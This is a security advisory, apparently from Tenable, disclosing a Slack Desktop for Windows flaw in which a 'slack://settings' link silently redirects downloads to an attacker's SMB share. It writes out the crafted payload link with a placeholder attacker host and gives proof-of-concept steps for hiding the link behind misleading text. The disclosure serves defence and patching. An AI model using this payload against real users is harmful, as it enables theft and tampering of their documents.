Synopsis
Tenable has discovered a vulnerability affecting Slack Desktop Application for Windows (versions prior to 3.4.0) that could allow attackers to steal downloaded documents.
An attacker can abuse the "slack://" protocol handler which has the capability of changing sensitive settings in the Slack Desktop Application. Crafting a link such as “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<newDownloadLocation>’}” will persitently change the default document download location if clicked. This new target download location can be an Attacker owned SMB share, which cause all future downloaded documents to be instantly uploaded to attacker's server, which can result in them be stolen or and even having their contents manipulated before victim opens them after download. Furthermore this attack can be concealed via clickjacking by using the "attachment" feature in slack API, which allows hyperlink's actual URI to be replaced with custom text.
The attack can be performed through any means that may get hyperlinked text to render in a Slack channel or Slack direct messaging. This includes authenticated vectors, where rouge Slack channel member sends link to group or individual through direct messaging, as well as unauthenticated vectors, such as external .RSS feeds or other externally pulled content that may hyperlink text in a slack channel.
Proof of Concept
- Attacker posts masqueraded hyperlink of "slack://settings/?update={‘PrefSSBFileDownloadPath’:'\\\\SMB-ip-address\\share’}" with misleading hyperlink text using "attachments" slack API feature.
- Victim clicks link, Slack default download location is silently changed.
- Victim downloads a document through Slack Application via private message or Slack channel. Downloaded document is immediately uploaded to attacker's SMB share.
- Document is now in Attacker's hands, which can choose to modify or simply steal.
- Victim can still open the downloaded document through application, however it will be from the attacker's SMB share.
Solution
Update to Slack App 3.4.0 or aboveDisclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team